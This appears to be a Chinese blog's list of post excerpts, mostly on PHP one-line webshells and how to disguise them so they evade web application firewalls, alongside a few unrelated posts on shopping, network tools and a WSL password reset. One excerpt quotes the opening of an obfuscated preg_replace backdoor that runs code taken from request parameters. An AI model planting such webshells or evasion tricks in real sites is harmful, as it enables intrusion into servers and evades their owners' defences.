PHP

淺析一句話后門中eval與assert執行條件與原理

eval與assert都算是元老級一句話后門函數,其實很多情形下代碼的執行還是需要依靠eval去執行,只是前鋒路轉了而已。 eval與assert函數的用法大家可以自行百度。 eval與assert區別 eval函數中參數是字符,如: eval('echo 1;'); assert函數中參數為表達式 (或者為函數),如: assert(phpinfo()) assert(eval('ec…繼續閱讀 »
滲透教程

php一句話后門過狗姿勢萬千之后門構造與隱藏【二】

聲明: 本文由博主首發于:阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載,請先聯系先知技術社區授權;未經授權請勿轉載。 上一篇:php一句話后門過狗姿勢萬千之理論篇【一】 第二章節主要帶給大家一些后門構造思路,與安全狗文件特征檢測的機制。 另外強調一下,這篇文章需…繼續閱讀 »
滲透教程

php一句話后門過狗姿勢萬千之傳輸層加工【三】

聲明: 本文由博主首發于:阿里先知?https://xianzhi.aliyun.com/forum/read/442.html 如需要轉載,請先聯系先知技術社區授權;未經授權請勿轉載。 先知技術社區投稿郵箱:Aliyun_xianzhi#service.alibaba.com   既然木馬已就緒,那么想要利用木馬,必然有一個數據傳輸的過程,數據提交是必須的,數據返回…繼續閱讀 »
滲透教程

php一句話后門過狗姿勢萬千之理論篇【一】

聲明: 本文由博主首發于:阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載,請先聯系先知技術社區授權;未經授權請勿轉載。 寫在前面: 過狗相關的資料網上也是有很多,所以在我接下來的文章中,可能觀點或者舉例可能會與網上部分雷同,或者表述不夠全面。 但是我只能說,我…繼續閱讀 »
這就是生活

論IT汪雙十一剁手的正確姿勢

雙十一,沒什么好說的,對這個具有中國現代主義特色的節日,可以總結為三個字,買買買。 對于雙十一的商業與經濟角度,不再做評價,知乎上的回答更有深度。 畢竟我只是一個平民,討論那些個經濟事態,國際化雙十一,跟我有個什么卵關系(馬云爸爸曾經也說過類似的大實話) 那么作為I…繼續閱讀 »
滲透工具 滲透教程

php一句話后門過5大WAF無壓力[安全狗+360網站衛士+護衛神+D盾]

最近研究過狗一句話有點走火入魔,目前研究了幾個版本的一句話,效果都還不錯。 授之于魚不如授之以漁,過幾天準備從理論層,代碼層,傳輸層寫個過狗連載教程。 目前我使用的是cknife軟件,類似于菜刀的開源軟件,雖然還有不少bug,但高度自由修改,不用擔心后門。我之所以沒有用菜刀,…繼續閱讀 »
滲透教程

php一句話后門的幾種變形分析[preg_replace函數]

今天偶然在土司看到一篇關于php后門的問題,讓我聯想到以前遇到過的一個一句話,共同點都是利用preg_replace中/e 修正符使replacement 參數當作 PHP 代碼來執行。 先來看下原版代碼 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…繼續閱讀 »
網絡運維

Connectify Dispatch指定程序使用指定網卡[運維神器]

很多時候,在進行內網維護的時候我們同時需要使用外網,但是當外網與內網同時使用的時候,除非程序已經建立穩定連接,否則新的網絡連接肯定會不如愿,比如當你ping一個ip的時候到底走的哪個網卡呢? 這時候就需要一個軟件來分配網卡,而這個工具我幾年前在學校的時候經常用,卻沒想到現在…繼續閱讀 »
網絡運維

win10子系統ubuntu linux暴力修改root用戶密碼

今天體驗了把win10子系統的ubuntu系統,感覺還不錯,安裝與使用教程就不用多提了,網上有一大把總體比較簡單。 但是就在讓我初始化用戶的時候我手賤輸了一個非root用戶,導致沒法切換root用戶,百度了下網上也沒有相關的討論。   索性直接來硬的嘍, 修改shadow文件 既然linux是windows的…繼續閱讀 »
烏云zone - 永久存檔

關于菜刀后門排查

關于菜刀后門排查 小杰哥 (能學則學,技多不壓身。) | 2016-03-08 14:56 …繼續閱讀 »
羽毛球地板胶